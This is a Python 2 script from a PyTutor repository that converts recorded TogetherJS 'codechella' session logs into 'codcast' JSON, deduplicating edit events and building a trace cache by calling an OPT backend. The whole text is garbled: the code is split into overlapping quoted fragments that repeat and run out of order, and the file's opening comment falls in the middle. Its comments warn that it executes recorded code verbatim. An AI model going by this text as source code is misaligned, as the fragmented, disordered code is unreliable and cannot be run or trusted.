oh wells, throw up our", "special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs,", "the ORIGINAL PERSON was who # initiated this edit event, and log their", "the codcast format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts # #", "session; keep the latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId =", "= {} firstInitialAppState = None firstClientId = None raw_events = [] # Key:", "defaultdict import dateutil.parser import json import os import sys import time from call_opt_backend", "= firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000", "'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] ==", "this script converts a codechella session log recorded by # ../../v3/opt_togetherjs/server.js # #", "the various OPT backends, depending on language TODOs: - not sure how much", "- not sure how much hashchange events matter - maybe we can use", "at vastly # different points in time, but let's cross that bridge when", "../js/demovideo.ts # # writes JSON output to stdout # created: 2018-05-27 ''' NB:", "but let's cross that bridge when # we get to it assert firstEditTimestamp", "from server] myTraceCache = [] for e in events: if e['type'] == 'app.executeCode':", "are DEFINITELY duplicated - app.hashchange events might also be duplicated - maybe ONLY", "the same with hashchange: log them only for the firstClientId user if typ", "lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events = [] for e in", "# ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to stdout # created:", "duplicated (or repeated N times if there are N people in the session)", "continue # read only the FIRST initialAppState since we'll assume that's who #", "only editCode events belonging # to the firstClientId user and discard all other", "firstClientId user and discard all other ones. if typ == 'app.editCode' and firstClientId", "know that the code in the editor contains those contents when they execute", "# and turns it into the codcast format, which is readable by #", "= call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace =", "kind of certainty. oh wells, throw up our hands for nows. NB: one", "really tricky to log editCode events since they often appear as # duplicates", "events for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET,", "THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM", "NB: this won't be fully accurate if there are several *independent* # sets", "the codcast object and write it out to stdout as JSON codcastObj =", "all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] !=", "THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! 
- the", "= rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read", "firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if this", "if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events", "events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object and write it out", "user if typ == 'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec)", "lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events", "events = [] for e in raw_events: tjs = e['togetherjs'] # clean up", "CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS,", "= {'color': '#8d549f'} # not sure if this is necessary # TODO: we", "ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up who the", "sure if this is necessary # TODO: we need to add frameNum field", "rec firstClientId = tjs['clientId'] # don't append any initialAppState events: if typ ==", "# assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events =", "'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if this is necessary events.insert(0,", "since we'll assume that's who # initiated the session if not firstInitialAppState and", "element of myTraceCache is a pair of [appState, cached trace from server] myTraceCache", "to essentially create a python-based driver (maybe using requests) to make the proper", "events might also be duplicated - maybe ONLY take hashchange events for YOURSELF?", "[] # Key: delta 'd' field, value: list of code edit events with", "WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY", "call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace']", "the session) since TogetherJS logs everyone's actions separately - app.editCode events are DEFINITELY", "TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS, THEN IT", "use app.executeCode events as 'sync points' since we know that the code in", "all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will fail if", "in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print", "output to stdout # created: 2018-05-27 ''' NB: now that i think about", "json import os import sys import time from call_opt_backend import call_opt_backend # somewhat", "need to add frameNum field later on; or maybe just add it here?!?", "{'color': '#8d549f'}} # not sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok", "pair of [appState, cached trace from server] myTraceCache = [] for e in", "= tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] #", "events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url", "== 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json()", "since TogetherJS logs everyone's actions separately - app.editCode events are DEFINITELY duplicated -", "import os import sys import time from call_opt_backend import call_opt_backend # 
somewhat modeled", "POSSIBLY HARM YOUR COMPUTER!!! - the solution to this is to run the", "initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) *", "will take care of # mapping clientId's to usernames for us ... #", "the FIRST initialAppState since we'll assume that's who # initiated the session if", "only for the firstClientId user if typ == 'hashchange' and firstClientId and tjs['clientId']", "codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} #", "necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object and write it", "'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES:", "format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON", "# somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update',", "throughout the # session; keep the latest one) clientIdtoUsername = {} firstInitialAppState =", "cached trace from server] myTraceCache = [] for e in events: if e['type']", "- app.hashchange events might also be duplicated - maybe ONLY take hashchange events", "firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will fail if we", "take place at vastly # different points in time, but let's cross that", "that bridge when # we get to it assert firstEditTimestamp <= t assert", "there are N people in the session) since TogetherJS logs everyone's actions separately", "DEFINITELY duplicated - app.hashchange events might also be duplicated - maybe ONLY take", "hashchange: log them only for the firstClientId user if typ == 'hashchange' and", "''' from collections import defaultdict import dateutil.parser import json import os import sys", "ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure if this", "tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas", "{'color': '#8d549f'} # not sure if this is necessary # TODO: we need", "* 1000 # milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent", "of events are duplicated (or repeated N times if there are N people", "r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace])", "note that this will fail if we have multiple # identical sets of", "of code edit events with that same 'd' # # NB: this won't", "same with hashchange: log them only for the firstClientId user if typ ==", "print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId']", "current username (might change throughout the # session; keep the latest one) clientIdtoUsername", "get to it assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000", "MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to this", "'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need", "initialAppState events: if typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) #", "ones. 
if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue #", "t - firstEditTimestamp < 5000 # give it a 5-second buffer for sanity", "the latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId = None raw_events", "from call_opt_backend import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState',", "...do the same with hashchange: log them only for the firstClientId user if", "(might change throughout the # session; keep the latest one) clientIdtoUsername = {}", "if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object", "the clientId for this event! # add these fields to match codcast format", "their clientId, which may be # different than your own clientId if tjs['type']", "up and append to final events dt = dateutil.parser.parse(e['date']) # get timestamp in", "5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change the clientId for", "and append to final events dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds", "collections import defaultdict import dateutil.parser import json import os import sys import time", "events matter - maybe we can use app.executeCode events as 'sync points' since", "hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE", "typ not in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since we'll", "# continue # get outta here! events = [] for e in raw_events:", "firstEdit['clientId'] # change the clientId for this event! # add these fields to", "events belonging # to the firstClientId user and discard all other ones. if", "# TODO: we need to add frameNum field later on; or maybe just", "THE CACHE; IF THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR", "we have multiple # identical sets of edits that take place at vastly", "more, it's not entirely clear to me whether you can always tell who", "'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe", "cache; we need to essentially create a python-based driver (maybe using requests) to", "import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update',", "'app.hashchange', ) # TODO: maybe we don't need this since TogetherJS will take", "on the actual server to generate a real trace for the trace cache;", "that same 'd' # # NB: this won't be fully accurate if there", "the session if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId", "solution to this is to run the code on the actual server to", "if typ not in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since", "firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a", "# # writes JSON output to stdout # created: 2018-05-27 ''' NB: now", "with any kind of certainty. 
oh wells, throw up our hands for nows.", "'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we", "startRecordingDemoEvent) # ok finally produce the codcast object and write it out to", "'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log", "in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up", "YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR", "produce the codcast object and write it out to stdout as JSON codcastObj", "it out to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events, 'traceCache':", "'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this since TogetherJS", "codcast object and write it out to stdout as JSON codcastObj = {'initialAppState':", ") # TODO: maybe we don't need this since TogetherJS will take care", "while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment", "who # initiated the session if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState", "often appear as # duplicates (or even more copies if there are more", "# ../../v3/opt_togetherjs/server.js # # and turns it into the codcast format, which is", "'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this since TogetherJS will", "when # we get to it assert firstEditTimestamp <= t assert t -", "myTraceCache is a pair of [appState, cached trace from server] myTraceCache = []", "= dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 #", "initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs", "care of # mapping clientId's to usernames for us ... # # Key:", "here! events = [] for e in raw_events: tjs = e['togetherjs'] # clean", "dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special app.startRecordingDemo", "repeated N times if there are N people in the session) since TogetherJS", "# ok finally produce the codcast object and write it out to stdout", "maybe ONLY take hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN THIS", "for us ... # # Key: clientId, Value: current username (might change throughout", "THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS", "'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if this is", "if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get", "RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE", "sure how much hashchange events matter - maybe we can use app.executeCode events", "'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this since", "tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! 
events = [] for", "- maybe ONLY take hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN", "one big challenge is that some types of events are duplicated (or repeated", "firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will", "with hashchange: log them only for the firstClientId user if typ == 'hashchange'", "after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode',", "# different than your own clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d']", "latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId = None raw_events =", "= firstEdit['clientId'] # change the clientId for this event! # add these fields", "language TODOs: - not sure how much hashchange events matter - maybe we", "= all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will fail", "entirely clear to me whether you can always tell who initiated an app.editCode", "- the solution to this is to run the code on the actual", "== 'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d']", "augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds #", "not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] #", "line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs =", "'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if", "raw_events: tjs = e['togetherjs'] # clean up and append to final events dt", "also be duplicated - maybe ONLY take hashchange events for YOURSELF? 
HUGE WARNING:", "# give it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] #", "to generate a real trace for the trace cache; we need to essentially", "from collections import defaultdict import dateutil.parser import json import os import sys import", "# read only the FIRST initialAppState since we'll assume that's who # initiated", "and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']:", "= tjs['clientId'] # don't append any initialAppState events: if typ == 'app.initialAppState': continue", "for app.codeEdit events, look up who the ORIGINAL PERSON was who # initiated", "if typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really", "fields to match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] =", "TogetherJS will take care of # mapping clientId's to usernames for us ...", "in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while", "# writes JSON output to stdout # created: 2018-05-27 ''' NB: now that", "various OPT backends, depending on language TODOs: - not sure how much hashchange", "tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure", "myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt", "- app.editCode events are DEFINITELY duplicated - app.hashchange events might also be duplicated", "people in the session). # the easiest way to manage it is to", "contents when they execute ''' from collections import defaultdict import dateutil.parser import json", "recorded by # ../../v3/opt_togetherjs/server.js # # and turns it into the codcast format,", "COMPUTER!!! - the solution to this is to run the code on the", "me whether you can always tell who initiated an app.editCode event with any", "of certainty. oh wells, throw up our hands for nows. NB: one big", "can use app.executeCode events as 'sync points' since we know that the code", "edits that take place at vastly # different points in time, but let's", "THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to this is", "than your own clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t =", "1000 # milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent =", "execute ''' from collections import defaultdict import dateutil.parser import json import os import", "= [] for e in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState']", "to manage it is to record only editCode events belonging # to the", "= r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print", "since they often appear as # duplicates (or even more copies if there", "i think about it more, it's not entirely clear to me whether you", "all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events since they often appear", "CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! 
- the solution", "../../v3/opt_togetherjs/server.js # # and turns it into the codcast format, which is readable", "is to run the code on the actual server to generate a real", "in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since we'll assume that's", "app.executeCode events as 'sync points' since we know that the code in the", "True tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary #", "defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue", "#print r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState,", "tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState", "and turns it into the codcast format, which is readable by # ../js/recorder.ts", "ok finally produce the codcast object and write it out to stdout as", "TODO: we need to add frameNum field later on; or maybe just add", "Key: clientId, Value: current username (might change throughout the # session; keep the", "appear as # duplicates (or even more copies if there are more people", "for line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs", "for the trace cache; we need to essentially create a python-based driver (maybe", "# clean up and append to final events dt = dateutil.parser.parse(e['date']) # get", "you can always tell who initiated an app.editCode event with any kind of", "< 5000 # give it a 5-second buffer for sanity checking tjs['clientId'] =", "the # session; keep the latest one) clientIdtoUsername = {} firstInitialAppState = None", "'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events since they often", "certainty. oh wells, throw up our hands for nows. NB: one big challenge", "take hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED", "are duplicated (or repeated N times if there are N people in the", "5000 # give it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId']", "they execute ''' from collections import defaultdict import dateutil.parser import json import os", "in raw_events: tjs = e['togetherjs'] # clean up and append to final events", "think about it more, it's not entirely clear to me whether you can", "need this since TogetherJS will take care of # mapping clientId's to usernames", "field, value: list of code edit events with that same 'd' # #", "open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ", "clientId, which may be # different than your own clientId if tjs['type'] ==", "duplicated - app.hashchange events might also be duplicated - maybe ONLY take hashchange", "initiated this edit event, and log their clientId, which may be # different", "firstEdit['delta']['t'] # sanity check: note that this will fail if we have multiple", "if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr,", "YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT", "app.editCode event with any kind of certainty. 
oh wells, throw up our hands", "# # Key: clientId, Value: current username (might change throughout the # session;", "= e['togetherjs'] # clean up and append to final events dt = dateutil.parser.parse(e['date'])", "* 1000 # for app.codeEdit events, look up who the ORIGINAL PERSON was", "int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special app.startRecordingDemo event to events", "if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in", "into the codcast format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts #", "log editCode events since they often appear as # duplicates (or even more", "requests) to make the proper calls to the various OPT backends, depending on", "and write it out to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events':", "ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since we'll assume that's who", "ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO", "= ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure if", "'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] # don't append any initialAppState events:", "tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure if this is", "'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this", "dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for", "to match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color':", "session) since TogetherJS logs everyone's actions separately - app.editCode events are DEFINITELY duplicated", "times which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]):", "using requests) to make the proper calls to the various OPT backends, depending", "they often appear as # duplicates (or even more copies if there are", "# sets of edits occurring at vastly different times which have the same", "make the proper calls to the various OPT backends, depending on language TODOs:", "wells, throw up our hands for nows. NB: one big challenge is that", "a codechella session log recorded by # ../../v3/opt_togetherjs/server.js # # and turns it", "NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE", "# different points in time, but let's cross that bridge when # we", "at vastly different times which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for", "accurate if there are several *independent* # sets of edits occurring at vastly", ">= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! 
events = [] for e", "serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else:", "people in the session) since TogetherJS logs everyone's actions separately - app.editCode events", "to run the code on the actual server to generate a real trace", "'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) #", "= None raw_events = [] # Key: delta 'd' field, value: list of", "fail if we have multiple # identical sets of edits that take place", "else: print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState']", "ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor',", "write it out to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events,", "have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec =", "the trace cache; we need to essentially create a python-based driver (maybe using", "since we know that the code in the editor contains those contents when", "call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update',", "# ...do the same with hashchange: log them only for the firstClientId user", "NB: now that i think about it more, it's not entirely clear to", "object and write it out to stdout as JSON codcastObj = {'initialAppState': initialAppState,", "might also be duplicated - maybe ONLY take hashchange events for YOURSELF? HUGE", "milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up who", "give it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change", "HARM YOUR COMPUTER!!! - the solution to this is to run the code", "events since they often appear as # duplicates (or even more copies if", "the actual server to generate a real trace for the trace cache; we", "format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not", "sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId']", "by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to stdout #", "just add it here?!? 
events.append(tjs) # each element of myTraceCache is a pair", "# not sure if this is necessary # TODO: we need to add", "= int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up who the ORIGINAL", "[] for e in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r", "'->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt =", "in time, but let's cross that bridge when # we get to it", "generate a real trace for the trace cache; we need to essentially create", "finally produce the codcast object and write it out to stdout as JSON", "IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE;", "to log editCode events since they often appear as # duplicates (or even", "== 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit", "times if there are N people in the session) since TogetherJS logs everyone's", "other ones. if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue", "that some types of events are duplicated (or repeated N times if there", "of # mapping clientId's to usernames for us ... # # Key: clientId,", "firstClientId = tjs['clientId'] # don't append any initialAppState events: if typ == 'app.initialAppState':", "log them only for the firstClientId user if typ == 'hashchange' and firstClientId", "add frameNum field later on; or maybe just add it here?!? events.append(tjs) #", "event with any kind of certainty. oh wells, throw up our hands for", "== 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events since they", "it's really tricky to log editCode events since they often appear as #", "dateutil.parser import json import os import sys import time from call_opt_backend import call_opt_backend", "# change the clientId for this event! # add these fields to match", "not sure how much hashchange events matter - maybe we can use app.executeCode", "e in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState)", "# don't append any initialAppState events: if typ == 'app.initialAppState': continue if typ", "discard all other ones. 
if typ == 'app.editCode' and firstClientId and tjs['clientId'] !=", "points in time, but let's cross that bridge when # we get to", "match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'}", "vastly different times which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line", "we get to it assert firstEditTimestamp <= t assert t - firstEditTimestamp <", "stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events, 'traceCache': myTraceCache} print json.dumps(codcastObj)", "when they execute ''' from collections import defaultdict import dateutil.parser import json import", "these fields to match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer']", "change throughout the # session; keep the latest one) clientIdtoUsername = {} firstInitialAppState", "!= 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if typ not in", "e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in serverResultJson:", "and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert", "to it assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 #", "create a python-based driver (maybe using requests) to make the proper calls to", "tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event! # add these", "readable by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to stdout", "delta 'd' field, value: list of code edit events with that same 'd'", "backends, depending on language TODOs: - not sure how much hashchange events matter", "and log their clientId, which may be # different than your own clientId", "the proper calls to the various OPT backends, depending on language TODOs: -", "tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta", "== 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue # ...do the same", "stdout # created: 2018-05-27 ''' NB: now that i think about it more,", "prepend a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'],", "<reponame>ipflsfiles/PyTutor # this script converts a codechella session log recorded by # ../../v3/opt_togetherjs/server.js", "won't be fully accurate if there are several *independent* # sets of edits", "everyone's actions separately - app.editCode events are DEFINITELY duplicated - app.hashchange events might", "are several *independent* # sets of edits occurring at vastly different times which", "WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to this is to run", "modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode',", "on language TODOs: - not sure how much hashchange events matter - maybe", "calls to the various OPT backends, depending on language TODOs: - not sure", "not sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the", "your own clientId if 